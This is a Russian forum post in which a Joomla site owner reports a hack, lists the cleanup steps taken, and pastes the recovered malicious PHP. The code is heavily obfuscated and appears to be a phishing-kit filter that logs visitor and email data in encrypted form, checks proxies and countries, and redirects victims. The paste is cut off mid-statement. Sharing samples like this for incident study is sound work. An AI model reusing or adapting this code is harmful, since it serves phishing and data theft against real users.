И так господа случилось... взломали один из моих проектов на Joomla простой сайт визитку которий я делал для себя по своему хобби - рукоделие и творчество.
Предисловие - с Joomla работаю оооочень давно еще со времени когда она називалась Mambo, делал много проектов как и себе так и коммерцию.
Иногда проект умерал и к нему не смотрели, так и случилось в сей раз.
Утром решил просто посмотреть что там по серверу и опанки...
Тело твари под спойлером мож кому интересно
Мой конфиг Joomla:
Joomla! 3.9.14
Что сделал?
- забекапил все как есть себе в архив
- почистил от гадства файлов и папок
- обновил Joomla
- накинул RSFirewal
- проверил поправил Chmod и конфиг
- поменял пароли
Что планирую?
- смотреть логи за те числа когда создались файл
- смотреть по компоненах что и как
- искать бекдор
- ну еще всякое амм по мелачам
Вот сопственно такие дела. У кого что такое случалось?
П.С. Продолжение будет
П.П.С. Вовремя обновляйтесь ))
Предисловие - с Joomla работаю оооочень давно еще со времени когда она називалась Mambo, делал много проектов как и себе так и коммерцию.
Иногда проект умерал и к нему не смотрели, так и случилось в сей раз.
Утром решил просто посмотреть что там по серверу и опанки...
Тело твари под спойлером мож кому интересно
PHP:
<?php
goto bKTjGD2P0BG__sO1; zC9a68sqxx1tkXlV: $TWmlpVdtBJWAok1F = preg_match_all("\57\100\x2f", $PPGFSAmSVYLz6tME, $MkUw9HqUWeD4PbO8); $TZI2mZXrkiGVKbgf = preg_match_all("\x2f\137\x2d\57", $PPGFSAmSVYLz6tME, $edTSaZkwn6Dtd9of); $f9yNS1pnxbKDwn0g = preg_match_all("\57\x3a\x3a\x24\x2f", $PPGFSAmSVYLz6tME, $TCjU8hYWvUjesxrb); $N5yUcGu4jRNT7Qog = preg_match_all("\57\136\x3a\x3a\57", $PPGFSAmSVYLz6tME, $VJ9GpnYVwzK7ZV5x); $LpkEAMi3e3fZ1o5y = explode("\73\54", $PPGFSAmSVYLz6tME); $D2p346Fzcbw2uuuF = preg_match_all("\x2f\137\x2d\x2f", $LpkEAMi3e3fZ1o5y[0], $jYsLbitgxJl1D38_); if (!isset($LpkEAMi3e3fZ1o5y[0]) || empty($LpkEAMi3e3fZ1o5y[0]) || !preg_match_all("\x2f\136\x3a\x3a\x2f", $LpkEAMi3e3fZ1o5y[0]) || !preg_match_all("\x2f\137\55\44\x2f", $LpkEAMi3e3fZ1o5y[0]) || count($jYsLbitgxJl1D38_[0]) != 2) { goto SAQHTDk_uDGaCoQ3; } goto onONIUOA_ezrfNPi; zC3fK33AoI3OPYtM: $RfF9qbPy9357_aBQ = str_replace("\137\x2d", '', $LpkEAMi3e3fZ1o5y[2]); goto XBJg5fql5Za0rDLy; f4rs1iHbu8JZu7Yx: $RfF9qbPy9357_aBQ = empty($LpkEAMi3e3fZ1o5y[2]) ? "\x49\x4e\x56\103\117\x44\72\x20\105\115\120\x54\131\137\62" : "\111\x4e\x56\103\117\104\72\x20" . urlencode($LpkEAMi3e3fZ1o5y[2]); XBJg5fql5Za0rDLy: $IS0xbWXQuJz3Ovil = preg_match_all("\x2f\137\55\57", $LpkEAMi3e3fZ1o5y[3], $TZE4SzjrjPr8_mgX); if (!isset($LpkEAMi3e3fZ1o5y[3]) || empty($LpkEAMi3e3fZ1o5y[3]) || !preg_match_all("\57\136\137\55\x2f", $LpkEAMi3e3fZ1o5y[3]) || !preg_match_all("\x2f\137\55\x24\57", $LpkEAMi3e3fZ1o5y[3]) || count($TZE4SzjrjPr8_mgX[0]) != 2) { goto uhI5ElC16Cg28jPk; } goto LFtt6oXTDUmZbf2M; hnbz1pfAn_MCpqkW: $POingwfurWBiy7Zz = getprox("{$N18zQYn3mXKLQAya}"); if ($POingwfurWBiy7Zz == 0) { goto EP1g4gIDjNiRvmmg; } if (oAlFTiwTmnzjiXeE == 1) { goto YlEv9BLeba4uE_Io; } $ubxJp4_tyNnuMJAy = "\x42\x41\104\x50\122\117\x58\174{$xVN5Lg9mV40ArM_5}\174{$fCfsgl9hhOt4M8Yv}\174{$RfF9qbPy9357_aBQ}\174{$xuyU2KqaqoxfJL4V}\x7c{$gr0JtUNx3TpNAGJF}\x7c{$XfCNpEdlB2QE7wbC}\174{$Lr655u_B0N6Sttmp}\x7c\x4e\125\x4c\x4c\x7c{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\x7c\x4e\x55\114\114\x7c\116\x55\x4c\114\x7c{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\174\x4e\125\x4c\114\174\x4e\125\x4c\x4c\x7c\12"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\12", FILE_APPEND); goto JSdAJ7W1QCMP5y4Q; YlEv9BLeba4uE_Io: goto KAEzYFjNh4DC2Whi; LFtt6oXTDUmZbf2M: $xuyU2KqaqoxfJL4V = str_replace("\137\x2d", '', $LpkEAMi3e3fZ1o5y[3]); goto PQCOY_tdeDsHcdzu; uhI5ElC16Cg28jPk: $xuyU2KqaqoxfJL4V = empty($LpkEAMi3e3fZ1o5y[3]) ? "\x49\116\126\103\117\104\x3a\40\105\115\120\x54\x59\x5f\x33" : "\x49\x4e\x56\103\117\x44\x3a\40" . urlencode($LpkEAMi3e3fZ1o5y[3]); PQCOY_tdeDsHcdzu: $GqPhclgcUDtKSZe9 = preg_match_all("\57\x5f\55\x2f", $LpkEAMi3e3fZ1o5y[4], $L3OnW3EBQ8xK3T9y); if (!isset($LpkEAMi3e3fZ1o5y[4]) || empty($LpkEAMi3e3fZ1o5y[4]) || !preg_match_all("\x2f\136\137\55\x2f", $LpkEAMi3e3fZ1o5y[4]) || !preg_match_all("\57\137\x2d\44\x2f", $LpkEAMi3e3fZ1o5y[4]) || count($L3OnW3EBQ8xK3T9y[0]) != 2) { goto F6zBp4v351Fh_gov; } goto T22ioxCPpuME9XPR; KK4WS8iXm8GQSYdN: $ubxJp4_tyNnuMJAy = "\x49\x4e\126\x41\114\x49\x44\103\x48\x49\123\115\105\174{$xVN5Lg9mV40ArM_5}\174{$fCfsgl9hhOt4M8Yv}\x7c{$RfF9qbPy9357_aBQ}\174{$xuyU2KqaqoxfJL4V}\174{$gr0JtUNx3TpNAGJF}\x7c{$XfCNpEdlB2QE7wbC}\174{$Lr655u_B0N6Sttmp}\x7c\116\125\x4c\x4c\174{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\x7c\116\125\114\x4c\174{$BM_zzKXaVQFoZoPt}\x7c{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\174\116\x55\114\114\174\x4e\125\114\114\xa"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\x3d", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); goto xWuvFm8_hHsA6AU9; goQ0t3utRd9onKGi: $ubxJp4_tyNnuMJAy = "\111\116\x56\x41\x4c\x49\x44\103\x48\111\x53\x4d\x45\174{$xVN5Lg9mV40ArM_5}\174{$fCfsgl9hhOt4M8Yv}\x7c{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\174{$gr0JtUNx3TpNAGJF}\174{$XfCNpEdlB2QE7wbC}\x7c{$Lr655u_B0N6Sttmp}\174\x4e\125\x4c\114\174{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\174\116\x55\114\114\174{$BM_zzKXaVQFoZoPt}\x7c{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\174\x4e\x55\114\114\x7c\x4e\125\x4c\114\12"; $wU4CtVKqM6Z_orXF = "\x49\156\x76\141\x6c\151\x64\40\x43\x68\x69\x73\155\145\72\50{$xVN5Lg9mV40ArM_5}\x7c{$fCfsgl9hhOt4M8Yv}\174{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\x7c{$gr0JtUNx3TpNAGJF}\174{$XfCNpEdlB2QE7wbC}\174{$Lr655u_B0N6Sttmp}\174{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\x7c{$BM_zzKXaVQFoZoPt}\174{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\51\12"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); goto dEV9AmMSJCWx04vp; DRMoXSx8DWZyHkn8: $ubxJp4_tyNnuMJAy = "\111\x4e\126\x41\x4c\111\104\x52\x45\x51\x55\105\123\x54\x7c\116\x55\114\x4c\174\116\x55\114\x4c\x7c\x4e\x55\114\x4c\x7c\x4e\125\114\x4c\x7c\x4e\125\114\114\x7c\x4e\x55\x4c\x4c\x7c\x4e\x55\114\114\174\x4e\125\114\114\x7c{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\x7c\116\125\114\x4c\174\x4e\x55\114\114\174{$tmyMKWt4dA6dyYhR}\x7c{$H8mhzXM5EZysVNWt}\x7c\x4e\x55\114\114\x7c\116\x55\114\x4c\xa"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\x3d", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); goto xEBzQagECZSzZEEG; C7UXfrAIjUMfBb0j: $ubxJp4_tyNnuMJAy = "\111\x4e\126\x41\114\111\x44\122\105\121\x55\x45\123\x54\174\116\125\x4c\114\x7c\116\125\114\114\x7c\116\125\114\x4c\174\116\125\x4c\114\174\x4e\125\114\114\174\x4e\125\114\x4c\x7c\x4e\125\x4c\x4c\x7c\116\125\x4c\114\x7c{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\x7c\116\125\x4c\x4c\174\116\125\x4c\x4c\x7c{$tmyMKWt4dA6dyYhR}\x7c{$H8mhzXM5EZysVNWt}\x7c\116\x55\x4c\x4c\174\116\125\x4c\114\12"; $wU4CtVKqM6Z_orXF = "\x49\x6e\166\x61\154\151\144\x20\122\145\x71\165\145\x73\x74\72\50{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\x7c{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\51\xa"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); goto KiYndqABDLSw7lPb; Hn77aa_qSgBZMM4I: $Lr655u_B0N6Sttmp = str_replace("\x5f\x2d", '', str_replace("\72\72", '', $LpkEAMi3e3fZ1o5y[6])); goto jJg8wkIMAOzE06hD; l6LlSoEMHM2Wl2Da: $Lr655u_B0N6Sttmp = empty($LpkEAMi3e3fZ1o5y[6]) ? "\111\116\x56\103\117\x44\x3a\40\x45\x4d\120\x54\131\137\x36" : "\111\116\x56\103\x4f\x44\x3a\x20" . urlencode($LpkEAMi3e3fZ1o5y[6]); jJg8wkIMAOzE06hD: if (!(count($t1S0nW1oSlYlrVY6[0]) != 6 || count($MkUw9HqUWeD4PbO8[0]) != 2 || count($edTSaZkwn6Dtd9of[0]) != 14 || count($TCjU8hYWvUjesxrb[0]) != 1 || count($VJ9GpnYVwzK7ZV5x[0]) != 1)) { goto Z5pIIWRIeDnZAabd; } if (oAlFTiwTmnzjiXeE == 1) { goto goQ0t3utRd9onKGi; } goto KK4WS8iXm8GQSYdN; eli0ovPkl9ujpBBA: file_put_contents(d3m8uJU4SCaPpWev . yDIWjLoQVkh9MQyQ, $N18zQYn3mXKLQAya . "\12", FILE_APPEND); include_once d3m8uJU4SCaPpWev . LMErg0ZYgdeYwBBg; die; TrVUxTCjY28hunf_: if (!stristr($RaQwVGqWAHE1oNUq, $qYcidWtGQjUQ7lrq)) { goto YSGdSkwKIgoQYNzk; } if (oAlFTiwTmnzjiXeE == 1) { goto AWEXxuFVbLzABb07; } $ubxJp4_tyNnuMJAy = "\x42\101\x44\x43\x4f\x55\116\x54\x52\x59\x7c{$xVN5Lg9mV40ArM_5}\x7c{$fCfsgl9hhOt4M8Yv}\174{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\x7c{$gr0JtUNx3TpNAGJF}\174{$XfCNpEdlB2QE7wbC}\174{$Lr655u_B0N6Sttmp}\x7c\x4e\125\114\x4c\174{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\174\x4e\x55\x4c\114\x7c\116\x55\x4c\114\174{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\x7c\116\125\114\114\x7c\116\125\114\114\x7c\xa"; goto NQP5TSZXDqTCFmbI; c0iDjXLkWxahS9gF: JPH1e2XLoey85u0m: $ubxJp4_tyNnuMJAy = "\102\114\117\103\x4b\x45\104\105\115\101\111\x4c\174{$xVN5Lg9mV40ArM_5}\174{$fCfsgl9hhOt4M8Yv}\174{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\174{$gr0JtUNx3TpNAGJF}\174{$XfCNpEdlB2QE7wbC}\x7c{$Lr655u_B0N6Sttmp}\174\x4e\x55\x4c\x4c\x7c{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\x7c\x73\x65\163\163\x69\157\156\151\144\72{$hVGFv1XNqPS33K6i}\x7c{$raBIirA9ZTY2Ep8c}\x7c{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\174\156\165\154\x6c\x7c\156\x75\154\154\174\xa"; $wU4CtVKqM6Z_orXF = "\x42\x6c\157\143\153\145\144\x20\105\x6d\141\151\154\x3a\x28{$xVN5Lg9mV40ArM_5}\174{$fCfsgl9hhOt4M8Yv}\174{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\x7c{$gr0JtUNx3TpNAGJF}\x7c{$XfCNpEdlB2QE7wbC}\x7c{$Lr655u_B0N6Sttmp}\174{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\x7c{$tmyMKWt4dA6dyYhR}\x7c{$H8mhzXM5EZysVNWt}\x29\12"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\12", FILE_APPEND); @file_put_contents(d3m8uJU4SCaPpWev . U8XdY3zTWrvgiVsY, $wU4CtVKqM6Z_orXF, FILE_APPEND); JpIdh2QE3sjsMxfX: file_put_contents(d3m8uJU4SCaPpWev . Paep5zA_6AXVwSd7, $N18zQYn3mXKLQAya . "\xa", FILE_APPEND); goto eli0ovPkl9ujpBBA; orK3AivAQsiN342e: zAS1d1CkDa8kSZHa: $ubxJp4_tyNnuMJAy = "\107\x4f\117\x44\x7c{$xVN5Lg9mV40ArM_5}\x7c{$fCfsgl9hhOt4M8Yv}\x7c{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\174{$gr0JtUNx3TpNAGJF}\174{$XfCNpEdlB2QE7wbC}\x7c{$Lr655u_B0N6Sttmp}\174\116\125\114\x4c\x7c{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\174{$hVGFv1XNqPS33K6i}\174{$raBIirA9ZTY2Ep8c}\174{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\174\x6e\165\154\154\x7c\x6e\165\154\154\174\12"; $wU4CtVKqM6Z_orXF = "\12\xa\x47\x6f\x6f\x64\x20\103\x6f\165\x6e\164\162\x79\x3a\50{$xVN5Lg9mV40ArM_5}\x7c{$fCfsgl9hhOt4M8Yv}\174{$RfF9qbPy9357_aBQ}\174{$xuyU2KqaqoxfJL4V}\174{$gr0JtUNx3TpNAGJF}\174{$XfCNpEdlB2QE7wbC}\174{$Lr655u_B0N6Sttmp}\174{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\174{$hVGFv1XNqPS33K6i}\174{$raBIirA9ZTY2Ep8c}\174{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\51\12\xa"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); @file_put_contents(d3m8uJU4SCaPpWev . U8XdY3zTWrvgiVsY, $wU4CtVKqM6Z_orXF, FILE_APPEND); er2pPFBAtq0bE62u: header("\x4c\117\x43\101\x54\x49\x4f\x4e\72\x20{$raBIirA9ZTY2Ep8c}"); goto olobdQBq6umc_iaA; OW9rxTqaMsVd1yp8: if (oAlFTiwTmnzjiXeE == 1) { goto ebYLwM8ALzYSPZZ9; } $ubxJp4_tyNnuMJAy = "\107\117\117\x44\x42\x41\103\113\174{$xVN5Lg9mV40ArM_5}\174{$fCfsgl9hhOt4M8Yv}\174{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\x7c{$gr0JtUNx3TpNAGJF}\174{$XfCNpEdlB2QE7wbC}\174{$Lr655u_B0N6Sttmp}\174\x4e\x55\x4c\x4c\x7c{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\174{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\x7c{$hVGFv1XNqPS33K6i}\x7c{$raBIirA9ZTY2Ep8c}\174{$tmyMKWt4dA6dyYhR}\x7c{$H8mhzXM5EZysVNWt}\174\x4e\125\x4c\114\174\116\125\x4c\x4c\x7c\12"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); goto O9upWssTnfe3S1c9; ebYLwM8ALzYSPZZ9: $ubxJp4_tyNnuMJAy = "\107\117\x4f\x44\x42\101\103\113\174{$xVN5Lg9mV40ArM_5}\174{$fCfsgl9hhOt4M8Yv}\x7c{$RfF9qbPy9357_aBQ}\174{$xuyU2KqaqoxfJL4V}\174{$gr0JtUNx3TpNAGJF}\x7c{$XfCNpEdlB2QE7wbC}\174{$Lr655u_B0N6Sttmp}\174\x4e\125\x4c\x4c\174{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\x7c{$hVGFv1XNqPS33K6i}\x7c{$raBIirA9ZTY2Ep8c}\x7c{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\174\116\x55\x4c\x4c\174\116\125\x4c\x4c\x7c\12"; $wU4CtVKqM6Z_orXF = "\xa\12\107\x6f\x6f\144\40\x43\x6f\x75\x6e\164\162\171\x20\102\x61\143\153\72\x28{$xVN5Lg9mV40ArM_5}\x7c{$fCfsgl9hhOt4M8Yv}\x7c{$RfF9qbPy9357_aBQ}\174{$xuyU2KqaqoxfJL4V}\174{$gr0JtUNx3TpNAGJF}\x7c{$XfCNpEdlB2QE7wbC}\x7c{$Lr655u_B0N6Sttmp}\x7c{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\x7c{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\x7c\163\145\163\163\151\x6f\156\x69\144\x3a{$hVGFv1XNqPS33K6i}\174{$raBIirA9ZTY2Ep8c}\x7c{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\x29\xa\12"; goto zbIROZJRQxURoMGa; T2iWPxO6c87oOGex: b5NKevC7peAnWsbr: $oykJTse4V8_5Ze8y = file_get_contents(d3m8uJU4SCaPpWev . dik51ssAdWx2gRVW); if (!preg_match("\57\x5c\142{$vtB5IH32Rv2kG8Cq}\x5c\142\57", $oykJTse4V8_5Ze8y)) { goto TrVUxTCjY28hunf_; } if (oAlFTiwTmnzjiXeE == 1) { goto JPH1e2XLoey85u0m; } $ubxJp4_tyNnuMJAy = "\102\114\117\103\x4b\105\104\105\x4d\x41\x49\114\174{$xVN5Lg9mV40ArM_5}\x7c{$fCfsgl9hhOt4M8Yv}\x7c{$RfF9qbPy9357_aBQ}\x7c{$xuyU2KqaqoxfJL4V}\x7c{$gr0JtUNx3TpNAGJF}\x7c{$XfCNpEdlB2QE7wbC}\x7c{$Lr655u_B0N6Sttmp}\174\116\x55\114\x4c\174{$N18zQYn3mXKLQAya}\174{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\174{$xXbaPBGGF4p2KKma}\x7c\163\145\x73\163\151\x6f\x6e\151\x64\72{$hVGFv1XNqPS33K6i}\174{$raBIirA9ZTY2Ep8c}\174{$tmyMKWt4dA6dyYhR}\x7c{$H8mhzXM5EZysVNWt}\174\x6e\x75\x6c\x6c\174\x6e\165\154\x6c\174\12"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\75", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); goto JpIdh2QE3sjsMxfX; goto c0iDjXLkWxahS9gF; baCdrD6OF8GywoD3: DXhJsEZP8enwkqcP: file_put_contents(d3m8uJU4SCaPpWev . Paep5zA_6AXVwSd7, $N18zQYn3mXKLQAya . "\12", FILE_APPEND); file_put_contents(d3m8uJU4SCaPpWev . yDIWjLoQVkh9MQyQ, $N18zQYn3mXKLQAya . "\12", FILE_APPEND); include_once d3m8uJU4SCaPpWev . LMErg0ZYgdeYwBBg; die; goto GhJAlFk9MPFtycf1; YSGdSkwKIgoQYNzk: goto hnbz1pfAn_MCpqkW; G5pv_OUul6Q5fUCq: $XfCNpEdlB2QE7wbC = str_replace("\x5f\55", '', $LpkEAMi3e3fZ1o5y[5]); goto n8z2jmUdke0js8hC; jr82931ISjRqB8jW: $XfCNpEdlB2QE7wbC = empty($LpkEAMi3e3fZ1o5y[5]) ? "\x49\116\x56\x43\x4f\104\x3a\40\105\115\120\124\x59\137\65" : "\111\116\126\103\117\104\x3a\x20" . urlencode($LpkEAMi3e3fZ1o5y[5]); n8z2jmUdke0js8hC: $NhVDPJGzLM8RE_YK = preg_match_all("\57\137\x2d\57", $LpkEAMi3e3fZ1o5y[6], $U31p7FxTrtUshLts); if (!isset($LpkEAMi3e3fZ1o5y[6]) || empty($LpkEAMi3e3fZ1o5y[6]) || !preg_match_all("\57\x3a\72\44\x2f", $LpkEAMi3e3fZ1o5y[6]) || !preg_match_all("\x2f\x5e\x5f\55\57", $LpkEAMi3e3fZ1o5y[6]) || count($U31p7FxTrtUshLts[0]) != 2) { goto l6LlSoEMHM2Wl2Da; } goto Hn77aa_qSgBZMM4I; X3reL_CU4q4nQPbj: include_once d3m8uJU4SCaPpWev . LMErg0ZYgdeYwBBg; die; goto X1NO87S9kz911y31; EP1g4gIDjNiRvmmg: if (!isset($_SESSION["\x4e\120\x4d\116\117"])) { goto PpPayEQHVfs8JaJo; } $hVGFv1XNqPS33K6i = $_SESSION["\x4e\x50\x4d\x4e\117"]; goto eH7G3WEDjf6eXODs; goto fegcY7SG_VLELVmV; fegcY7SG_VLELVmV: PpPayEQHVfs8JaJo: $bfLkRblWV0c0fuZR = "\117\x52\x49\x6a\x79\x73\145\x70\61\x30\x2e\141\x6d\160\x75\154\165\x73\x2e\143\x6f\155\56" . randString(); $_SESSION["\x4e\120\115\x4e\x4f"] = $bfLkRblWV0c0fuZR; $hVGFv1XNqPS33K6i = $_SESSION["\116\x50\115\x4e\x4f"]; $IEB52o_Vm21j5Gdl = strtoupper($qYcidWtGQjUQ7lrq); $_SESSION["\x43\x4e"] = $IEB52o_Vm21j5Gdl; $_SESSION["\103\116\114"] = $IEB52o_Vm21j5Gdl; goto YW61f_CsSQN2twCt; YW61f_CsSQN2twCt: $IEXQY1edeyi415qJ = str_replace("\75", '', rc4two($bfLkRblWV0c0fuZR . "\x3b\x2c" . $IEB52o_Vm21j5Gdl, $mRQVCD0vyT_gjSVw, $TLfeKQXYbiXCTf38 = true)); if (isset($_COOKIE["\x70\x72\x6f\x76\166\144\x73"])) { goto COgfwwBlIkp_wdEU; } setcookie("\x70\162\157\166\166\144\163", $IEXQY1edeyi415qJ, time() + 3600 * 24 * 2, "\57"); COgfwwBlIkp_wdEU: eH7G3WEDjf6eXODs: if (!isset($_SESSION["\114\x53\124\103\122"])) { goto fEMw945I_Bt1DyJu; } $raBIirA9ZTY2Ep8c = $_SESSION["\114\x53\124\103\122"]; goto OW9rxTqaMsVd1yp8; T22ioxCPpuME9XPR: $gr0JtUNx3TpNAGJF = str_replace("\137\55", '', $LpkEAMi3e3fZ1o5y[4]); goto Nc991FXnwWCLTrC6; F6zBp4v351Fh_gov: $gr0JtUNx3TpNAGJF = empty($LpkEAMi3e3fZ1o5y[4]) ? "\x49\x4e\x56\x43\x4f\x44\x3a\x20\105\115\x50\x54\x59\x5f\64" : "\x49\116\x56\x43\117\x44\72\40" . urlencode($LpkEAMi3e3fZ1o5y[4]); Nc991FXnwWCLTrC6: $DtAAGD5S8zLaL4Ax = preg_match_all("\x2f\x5f\55\57", $LpkEAMi3e3fZ1o5y[5], $ZWTtT5PRxpAdAVt3); if (!isset($LpkEAMi3e3fZ1o5y[5]) || empty($LpkEAMi3e3fZ1o5y[5]) || !preg_match_all("\57\136\137\55\57", $LpkEAMi3e3fZ1o5y[5]) || !preg_match_all("\x2f\137\x2d\44\57", $LpkEAMi3e3fZ1o5y[5]) || count($ZWTtT5PRxpAdAVt3[0]) != 2) { goto jr82931ISjRqB8jW; } goto G5pv_OUul6Q5fUCq; VN2NFhq35urROeIR: $wU4CtVKqM6Z_orXF = "\111\x6e\x76\x61\x6c\x69\144\x20\x43\x6f\x64\145\x3a\50{$vtB5IH32Rv2kG8Cq}\x7c{$N18zQYn3mXKLQAya}\x7c{$faETarzgANoELren}\x7c{$qYcidWtGQjUQ7lrq}\174{$qpvrC6IWo9e7YJVG}\x7c{$xXbaPBGGF4p2KKma}\x7c{$tmyMKWt4dA6dyYhR}\174{$H8mhzXM5EZysVNWt}\x29\12"; @file_put_contents(d3m8uJU4SCaPpWev . AfDwTaqRMcZYQhJC, urlencode(str_replace("\x3d", '', rc4two($ubxJp4_tyNnuMJAy, $DXcdX1Vk0fQ5QiY6, $TLfeKQXYbiXCTf38 = true))) . "\xa", FILE_APPEND); @file_put_contents(d3m8uJU4SCaPpWev . U8XdY3zTWrvgiVsY, $wU4CtVKqM6Z_orXF, FILE_APPEND); qytB9dDz6In4CUZX: include_once d3m8uJU4SCaPpWev . LMErg0ZYgdeYwBBg; die; goto oMF0wGX2u_4e96bF; goto T2iWPxO6c87oOGex; te_gBnS2FEpgvqIb: if (valid_email($vtB5IH32Rv2kG8Cq)) { goto b5NKevC7peAnWsbr; } if (oAlFTiwTmnzjiXeE == 1) { goto q8oo15W01_OLdL77; } $ubxJp4_tyNnuMJAy = 